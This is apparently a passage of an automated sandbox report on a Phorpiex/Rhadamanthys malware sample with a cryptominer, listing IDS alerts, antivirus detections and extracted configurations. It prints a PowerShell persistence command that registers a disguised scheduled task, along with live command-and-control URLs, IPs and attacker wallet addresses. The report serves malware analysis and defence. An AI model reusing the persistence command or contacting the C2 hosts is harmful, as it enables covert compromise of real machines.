-DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7296, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentProcessId: 8088, ParentProcessName: 2779421088.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8108, ProcessName: svchost.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:40.488686+010020220501A Network Trojan was detected185.215.113.6680192.168.2.1149710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:34.169860+010020220511A Network Trojan was detected185.215.113.6680192.168.2.1149710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:40.487004+010020197142Potentially Bad Traffic192.168.2.1149710185.215.113.6680TCP
                          2024-12-05T17:32:05.059911+010020197142Potentially Bad Traffic192.168.2.1149775185.215.113.6680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:58.006372+010020440771A Network Trojan was detected192.168.2.116230795.81.102.7240500UDP
                          2024-12-05T17:32:03.043155+010020440771A Network Trojan was detected192.168.2.116230792.38.19.1040500UDP
                          2024-12-05T17:32:08.039333+010020440771A Network Trojan was detected192.168.2.116230745.150.24.4240500UDP
                          2024-12-05T17:32:13.051634+010020440771A Network Trojan was detected192.168.2.11623072.187.91.10840500UDP
                          2024-12-05T17:32:18.068485+010020440771A Network Trojan was detected192.168.2.1162307109.74.69.4340500UDP
                          2024-12-05T17:32:28.290139+010020440771A Network Trojan was detected192.168.2.11623072.133.136.14540500UDP
                          2024-12-05T17:32:33.313347+010020440771A Network Trojan was detected192.168.2.11623072.176.72.13640500UDP
                          2024-12-05T17:32:38.355798+010020440771A Network Trojan was detected192.168.2.116230789.236.217.7140500UDP
                          2024-12-05T17:32:43.364147+010020440771A Network Trojan was detected192.168.2.116230789.219.115.15640500UDP
                          2024-12-05T17:32:48.383200+010020440771A Network Trojan was detected192.168.2.1162307213.230.126.3940500UDP
                          2024-12-05T17:32:53.380543+010020440771A Network Trojan was detected192.168.2.11623072.179.117.3340500UDP
                          2024-12-05T17:32:58.401795+010020440771A Network Trojan was detected192.168.2.1162307217.30.162.16140500UDP
                          2024-12-05T17:33:03.441463+010020440771A Network Trojan was detected192.168.2.116230795.59.165.10240500UDP
                          2024-12-05T17:33:08.475109+010020440771A Network Trojan was detected192.168.2.116230790.156.160.3040500UDP
                          2024-12-05T17:33:13.491162+010020440771A Network Trojan was detected192.168.2.116230788.204.241.18240500UDP
                          2024-12-05T17:33:28.529779+010020440771A Network Trojan was detected192.168.2.1162307154.71.253.5440500UDP
                          2024-12-05T17:33:33.520524+010020440771A Network Trojan was detected192.168.2.116230792.124.152.23640500UDP
                          2024-12-05T17:33:38.540485+010020440771A Network Trojan was detected192.168.2.116230790.156.162.540500UDP
                          2024-12-05T17:33:53.590550+010020440771A Network Trojan was detected192.168.2.1162307151.242.48.1940500UDP
                          2024-12-05T17:34:03.604243+010020440771A Network Trojan was detected192.168.2.1162307178.67.165.8840500UDP
                          2024-12-05T17:34:08.634390+010020440771A Network Trojan was detected192.168.2.116230731.47.175.3940500UDP
                          2024-12-05T17:34:13.675559+010020440771A Network Trojan was detected192.168.2.1162307189.173.142.19240500UDP
                          2024-12-05T17:34:18.713529+010020440771A Network Trojan was detected192.168.2.1162307198.163.204.640500UDP
                          2024-12-05T17:34:23.722460+010020440771A Network Trojan was detected192.168.2.116230785.9.133.20240500UDP
                          2024-12-05T17:34:28.755066+010020440771A Network Trojan was detected192.168.2.116230737.21.118.10640500UDP
                          2024-12-05T17:34:33.775801+010020440771A Network Trojan was detected192.168.2.116230738.222.194.19040500UDP
                          2024-12-05T17:34:38.819079+010020440771A Network Trojan was detected192.168.2.116230778.109.103.10340500UDP
                          2024-12-05T17:34:43.846973+010020440771A Network Trojan was detected192.168.2.11623072.133.70.6640500UDP
                          2024-12-05T17:34:48.870685+010020440771A Network Trojan was detected192.168.2.11623075.76.0.20340500UDP
                          2024-12-05T17:34:54.015756+010020440771A Network Trojan was detected192.168.2.1162307109.68.122.1440500UDP
                          2024-12-05T17:35:09.510773+010020440771A Network Trojan was detected192.168.2.1162307189.167.22.3640500UDP
                          2024-12-05T17:35:19.548640+010020440771A Network Trojan was detected192.168.2.1162307212.13.170.22340500UDP
                          2024-12-05T17:35:24.568299+010020440771A Network Trojan was detected192.168.2.116230789.249.62.740500UDP
                          2024-12-05T17:35:34.608881+010020440771A Network Trojan was detected192.168.2.116230746.248.34.1240500UDP
                          2024-12-05T17:35:49.628423+010020440771A Network Trojan was detected192.168.2.11623072.180.115.7640500UDP
                          2024-12-05T17:35:59.643983+010020440771A Network Trojan was detected192.168.2.1162307178.253.102.21440500UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:34.169860+010028269302Crypto Currency Mining Activity Detected192.168.2.1150039185.215.113.665152TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:45.063425+010028032742Potentially Bad Traffic192.168.2.1149721185.215.113.6680TCP
                          2024-12-05T17:31:52.642676+010028032742Potentially Bad Traffic192.168.2.1149721185.215.113.6680TCP
                          2024-12-05T17:31:56.247698+010028032742Potentially Bad Traffic192.168.2.1149747185.215.113.6680TCP
                          2024-12-05T17:31:59.111763+010028032742Potentially Bad Traffic192.168.2.1149756185.215.113.6680TCP
                          2024-12-05T17:32:04.849116+010028032742Potentially Bad Traffic192.168.2.1149756185.215.113.6680TCP
                          2024-12-05T17:32:05.059911+010028032742Potentially Bad Traffic192.168.2.1149775185.215.113.6680TCP
                          2024-12-05T17:32:07.374436+010028032742Potentially Bad Traffic192.168.2.1149781185.215.113.6680TCP
                          2024-12-05T17:32:12.945904+010028032742Potentially Bad Traffic192.168.2.1149781185.215.113.6680TCP
                          2024-12-05T17:32:13.190239+010028032742Potentially Bad Traffic192.168.2.1149793185.215.113.8480TCP
                          2024-12-05T17:32:15.415639+010028032742Potentially Bad Traffic192.168.2.1149800185.215.113.6680TCP
                          2024-12-05T17:32:21.799108+010028032742Potentially Bad Traffic192.168.2.1149800185.215.113.6680TCP
                          2024-12-05T17:32:24.736506+010028032742Potentially Bad Traffic192.168.2.1149819185.215.113.6680TCP
                          2024-12-05T17:32:30.897343+010028032742Potentially Bad Traffic192.168.2.114983391.202.233.14180TCP
                          2024-12-05T17:32:30.926727+010028032742Potentially Bad Traffic192.168.2.1149819185.215.113.6680TCP
                          2024-12-05T17:32:33.492490+010028032742Potentially Bad Traffic192.168.2.1149838185.215.113.6680TCP
                          2024-12-05T17:32:41.753669+010028032742Potentially Bad Traffic192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:44.277680+010028032742Potentially Bad Traffic192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:47.058413+010028032742Potentially Bad Traffic192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:49.525535+010028032742Potentially Bad Traffic192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:52.001242+010028032742Potentially Bad Traffic192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:56.706016+010028032742Potentially Bad Traffic192.168.2.1149903185.215.113.6680TCP
                          2024-12-05T17:33:00.283137+010028032742Potentially Bad Traffic192.168.2.1149912185.215.113.6680TCP
                          2024-12-05T17:33:04.389434+010028032742Potentially Bad Traffic192.168.2.1149922185.215.113.6680TCP
                          2024-12-05T17:33:08.017766+010028032742Potentially Bad Traffic192.168.2.1149933185.215.113.6680TCP
                          2024-12-05T17:33:11.536043+010028032742Potentially Bad Traffic192.168.2.1149941185.215.113.6680TCP
                          2024-12-05T17:33:16.187905+010028032742Potentially Bad Traffic192.168.2.114995391.202.233.14180TCP
                          2024-12-05T17:33:19.696726+010028032742Potentially Bad Traffic192.168.2.114996391.202.233.14180TCP
                          2024-12-05T17:33:23.261472+010028032742Potentially Bad Traffic192.168.2.114997191.202.233.14180TCP
                          2024-12-05T17:33:26.948685+010028032742Potentially Bad Traffic192.168.2.114998191.202.233.14180TCP
                          2024-12-05T17:33:30.498877+010028032742Potentially Bad Traffic192.168.2.114999191.202.233.14180TCP
                          2024-12-05T17:33:35.287748+010028032742Potentially Bad Traffic192.168.2.1150003185.215.113.6680TCP
                          2024-12-05T17:33:38.893392+010028032742Potentially Bad Traffic192.168.2.1150010185.215.113.6680TCP
                          2024-12-05T17:33:42.671566+010028032742Potentially Bad Traffic192.168.2.1150020185.215.113.6680TCP
                          2024-12-05T17:33:46.277185+010028032742Potentially Bad Traffic192.168.2.1150028185.215.113.6680TCP
                          2024-12-05T17:33:49.902410+010028032742Potentially Bad Traffic192.168.2.1150031185.215.113.6680TCP
                          2024-12-05T17:33:54.656231+010028032742Potentially Bad Traffic192.168.2.115003391.202.233.14180TCP
                          2024-12-05T17:33:58.212808+010028032742Potentially Bad Traffic192.168.2.115003591.202.233.14180TCP
                          2024-12-05T17:34:01.914153+010028032742Potentially Bad Traffic192.168.2.115003691.202.233.14180TCP
                          2024-12-05T17:34:05.860091+010028032742Potentially Bad Traffic192.168.2.115003891.202.233.14180TCP
                          2024-12-05T17:34:10.077835+010028032742Potentially Bad Traffic192.168.2.115004191.202.233.14180TCP
                          2024-12-05T17:34:15.521961+010028032742Potentially Bad Traffic192.168.2.1150043185.215.113.6680TCP
                          2024-12-05T17:34:19.357396+010028032742Potentially Bad Traffic192.168.2.1150045185.215.113.6680TCP
                          2024-12-05T17:34:23.229363+010028032742Potentially Bad Traffic192.168.2.1150046185.215.113.6680TCP
                          2024-12-05T17:34:27.083721+010028032742Potentially Bad Traffic192.168.2.1150048185.215.113.6680TCP
                          2024-12-05T17:34:30.871341+010028032742Potentially Bad Traffic192.168.2.1150050185.215.113.6680TCP
                          2024-12-05T17:34:36.240351+010028032742Potentially Bad Traffic192.168.2.115005291.202.233.14180TCP
                          2024-12-05T17:34:40.418042+010028032742Potentially Bad Traffic192.168.2.115005491.202.233.14180TCP
                          2024-12-05T17:34:44.421681+010028032742Potentially Bad Traffic192.168.2.115005591.202.233.14180TCP
                          2024-12-05T17:34:48.157586+010028032742Potentially Bad Traffic192.168.2.115005791.202.233.14180TCP
                          2024-12-05T17:34:52.510546+010028032742Potentially Bad Traffic192.168.2.115005991.202.233.14180TCP
                          2024-12-05T17:34:58.674738+010028032742Potentially Bad Traffic192.168.2.1150061185.215.113.6680TCP
                          2024-12-05T17:35:02.360041+010028032742Potentially Bad Traffic192.168.2.1150063185.215.113.6680TCP
                          2024-12-05T17:35:06.198040+010028032742Potentially Bad Traffic192.168.2.1150064185.215.113.6680TCP
                          2024-12-05T17:35:09.837541+010028032742Potentially Bad Traffic192.168.2.1150066185.215.113.6680TCP
                          2024-12-05T17:35:13.491459+010028032742Potentially Bad Traffic192.168.2.1150068185.215.113.6680TCP
                          2024-12-05T17:35:18.167455+010028032742Potentially Bad Traffic192.168.2.115007091.202.233.14180TCP
                          2024-12-05T17:35:21.797150+010028032742Potentially Bad Traffic192.168.2.115007191.202.233.14180TCP
                          2024-12-05T17:35:25.411308+010028032742Potentially Bad Traffic192.168.2.115007391.202.233.14180TCP
                          2024-12-05T17:35:29.061048+010028032742Potentially Bad Traffic192.168.2.115007591.202.233.14180TCP
                          2024-12-05T17:35:32.740048+010028032742Potentially Bad Traffic192.168.2.115007791.202.233.14180TCP
                          2024-12-05T17:35:37.820344+010028032742Potentially Bad Traffic192.168.2.1150078185.215.113.6680TCP
                          2024-12-05T17:35:41.796669+010028032742Potentially Bad Traffic192.168.2.1150080185.215.113.6680TCP
                          2024-12-05T17:35:45.373070+010028032742Potentially Bad Traffic192.168.2.1150082185.215.113.6680TCP
                          2024-12-05T17:35:48.870959+010028032742Potentially Bad Traffic192.168.2.1150084185.215.113.6680TCP
                          2024-12-05T17:35:52.381305+010028032742Potentially Bad Traffic192.168.2.1150085185.215.113.6680TCP
                          2024-12-05T17:35:56.905546+010028032742Potentially Bad Traffic192.168.2.115008791.202.233.14180TCP
                          2024-12-05T17:36:00.434999+010028032742Potentially Bad Traffic192.168.2.115008991.202.233.14180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:43.307087+010028565631A Network Trojan was detected192.168.2.11634631.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:32:11.707461+010028548021Domain Observed Used for C2 Detected92.255.85.665188192.168.2.1149792TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:34.169860+010028532721A Network Trojan was detected185.215.113.6680192.168.2.1149710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:52.642676+010028532921Malware Command and Control Activity Detected192.168.2.1149721185.215.113.6680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T17:31:56.247698+010028482951A Network Trojan was detected192.168.2.1149747185.215.113.6680TCP
                          2024-12-05T17:31:59.111763+010028482951A Network Trojan was detected192.168.2.1149756185.215.113.6680TCP
                          2024-12-05T17:32:04.849116+010028482951A Network Trojan was detected192.168.2.1149756185.215.113.6680TCP
                          2024-12-05T17:32:07.374436+010028482951A Network Trojan was detected192.168.2.1149781185.215.113.6680TCP
                          2024-12-05T17:32:12.945904+010028482951A Network Trojan was detected192.168.2.1149781185.215.113.6680TCP
                          2024-12-05T17:32:15.415639+010028482951A Network Trojan was detected192.168.2.1149800185.215.113.6680TCP
                          2024-12-05T17:32:21.799108+010028482951A Network Trojan was detected192.168.2.1149800185.215.113.6680TCP
                          2024-12-05T17:32:24.736506+010028482951A Network Trojan was detected192.168.2.1149819185.215.113.6680TCP
                          2024-12-05T17:32:30.926727+010028482951A Network Trojan was detected192.168.2.1149819185.215.113.6680TCP
                          2024-12-05T17:32:33.492490+010028482951A Network Trojan was detected192.168.2.1149838185.215.113.6680TCP
                          2024-12-05T17:32:41.753669+010028482951A Network Trojan was detected192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:44.277680+010028482951A Network Trojan was detected192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:47.058413+010028482951A Network Trojan was detected192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:49.525535+010028482951A Network Trojan was detected192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:52.001242+010028482951A Network Trojan was detected192.168.2.114986091.202.233.14180TCP
                          2024-12-05T17:32:56.706016+010028482951A Network Trojan was detected192.168.2.1149903185.215.113.6680TCP
                          2024-12-05T17:33:00.283137+010028482951A Network Trojan was detected192.168.2.1149912185.215.113.6680TCP
                          2024-12-05T17:33:04.389434+010028482951A Network Trojan was detected192.168.2.1149922185.215.113.6680TCP
                          2024-12-05T17:33:08.017766+010028482951A Network Trojan was detected192.168.2.1149933185.215.113.6680TCP
                          2024-12-05T17:33:11.536043+010028482951A Network Trojan was detected192.168.2.1149941185.215.113.6680TCP
                          2024-12-05T17:33:16.187905+010028482951A Network Trojan was detected192.168.2.114995391.202.233.14180TCP
                          2024-12-05T17:33:19.696726+010028482951A Network Trojan was detected192.168.2.114996391.202.233.14180TCP
                          2024-12-05T17:33:23.261472+010028482951A Network Trojan was detected192.168.2.114997191.202.233.14180TCP
                          2024-12-05T17:33:26.948685+010028482951A Network Trojan was detected192.168.2.114998191.202.233.14180TCP
                          2024-12-05T17:33:30.498877+010028482951A Network Trojan was detected192.168.2.114999191.202.233.14180TCP
                          2024-12-05T17:33:35.287748+010028482951A Network Trojan was detected192.168.2.1150003185.215.113.6680TCP
                          2024-12-05T17:33:38.893392+010028482951A Network Trojan was detected192.168.2.1150010185.215.113.6680TCP
                          2024-12-05T17:33:42.671566+010028482951A Network Trojan was detected192.168.2.1150020185.215.113.6680TCP
                          2024-12-05T17:33:46.277185+010028482951A Network Trojan was detected192.168.2.1150028185.215.113.6680TCP
                          2024-12-05T17:33:49.902410+010028482951A Network Trojan was detected192.168.2.1150031185.215.113.6680TCP
                          2024-12-05T17:33:54.656231+010028482951A Network Trojan was detected192.168.2.115003391.202.233.14180TCP
                          2024-12-05T17:33:58.212808+010028482951A Network Trojan was detected192.168.2.115003591.202.233.14180TCP
                          2024-12-05T17:34:01.914153+010028482951A Network Trojan was detected192.168.2.115003691.202.233.14180TCP
                          2024-12-05T17:34:05.860091+010028482951A Network Trojan was detected192.168.2.115003891.202.233.14180TCP
                          2024-12-05T17:34:10.077835+010028482951A Network Trojan was detected192.168.2.115004191.202.233.14180TCP
                          2024-12-05T17:34:15.521961+010028482951A Network Trojan was detected192.168.2.1150043185.215.113.6680TCP
                          2024-12-05T17:34:19.357396+010028482951A Network Trojan was detected192.168.2.1150045185.215.113.6680TCP
                          2024-12-05T17:34:23.229363+010028482951A Network Trojan was detected192.168.2.1150046185.215.113.6680TCP
                          2024-12-05T17:34:27.083721+010028482951A Network Trojan was detected192.168.2.1150048185.215.113.6680TCP
                          2024-12-05T17:34:30.871341+010028482951A Network Trojan was detected192.168.2.1150050185.215.113.6680TCP
                          2024-12-05T17:34:36.240351+010028482951A Network Trojan was detected192.168.2.115005291.202.233.14180TCP
                          2024-12-05T17:34:40.418042+010028482951A Network Trojan was detected192.168.2.115005491.202.233.14180TCP
                          2024-12-05T17:34:44.421681+010028482951A Network Trojan was detected192.168.2.115005591.202.233.14180TCP
                          2024-12-05T17:34:48.157586+010028482951A Network Trojan was detected192.168.2.115005791.202.233.14180TCP
                          2024-12-05T17:34:52.510546+010028482951A Network Trojan was detected192.168.2.115005991.202.233.14180TCP
                          2024-12-05T17:34:58.674738+010028482951A Network Trojan was detected192.168.2.1150061185.215.113.6680TCP
                          2024-12-05T17:35:02.360041+010028482951A Network Trojan was detected192.168.2.1150063185.215.113.6680TCP
                          2024-12-05T17:35:06.198040+010028482951A Network Trojan was detected192.168.2.1150064185.215.113.6680TCP
                          2024-12-05T17:35:09.837541+010028482951A Network Trojan was detected192.168.2.1150066185.215.113.6680TCP
                          2024-12-05T17:35:13.491459+010028482951A Network Trojan was detected192.168.2.1150068185.215.113.6680TCP
                          2024-12-05T17:35:18.167455+010028482951A Network Trojan was detected192.168.2.115007091.202.233.14180TCP
                          2024-12-05T17:35:21.797150+010028482951A Network Trojan was detected192.168.2.115007191.202.233.14180TCP
                          2024-12-05T17:35:25.411308+010028482951A Network Trojan was detected192.168.2.115007391.202.233.14180TCP
                          2024-12-05T17:35:29.061048+010028482951A Network Trojan was detected192.168.2.115007591.202.233.14180TCP
                          2024-12-05T17:35:32.740048+010028482951A Network Trojan was detected192.168.2.115007791.202.233.14180TCP
                          2024-12-05T17:35:37.820344+010028482951A Network Trojan was detected192.168.2.1150078185.215.113.6680TCP
                          2024-12-05T17:35:41.796669+010028482951A Network Trojan was detected192.168.2.1150080185.215.113.6680TCP
                          2024-12-05T17:35:45.373070+010028482951A Network Trojan was detected192.168.2.1150082185.215.113.6680TCP
                          2024-12-05T17:35:48.870959+010028482951A Network Trojan was detected192.168.2.1150084185.215.113.6680TCP
                          2024-12-05T17:35:52.381305+010028482951A Network Trojan was detected192.168.2.1150085185.215.113.6680TCP
                          2024-12-05T17:35:56.905546+010028482951A Network Trojan was detected192.168.2.115008791.202.233.14180TCP
                          2024-12-05T17:36:00.434999+010028482951A Network Trojan was detected192.168.2.115008991.202.233.14180TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: f5TWdT5EAc.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exeAvira: detection malicious, Label: HEUR/AGEN.1351777
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeAvira: detection malicious, Label: HEUR/AGEN.1351777
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeAvira: detection malicious, Label: WORM/Phorpiex.olrti
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Source: 9.2.2779421088.exe.f40000.0.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f"}
                          Source: 5.0.sysnldcvmr.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exeReversingLabs: Detection: 95%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeReversingLabs: Detection: 95%
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpReversingLabs: Detection: 70%
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeReversingLabs: Detection: 76%
                          Source: C:\Windows\sysnldcvmr.exeReversingLabs: Detection: 95%
                          Source: f5TWdT5EAc.exeReversingLabs: Detection: 60%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeJoe Sandbox ML: detected
                          Source: f5TWdT5EAc.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040BE80
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,5_2_0040BE80
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,7_2_0040BE80

                          Phishing

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 896429707.exe PID: 7668, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysnldcvmr.exe PID: 7744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysnldcvmr.exe PID: 8000, type: MEMORYSTR

                          Bitcoin Miner

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE
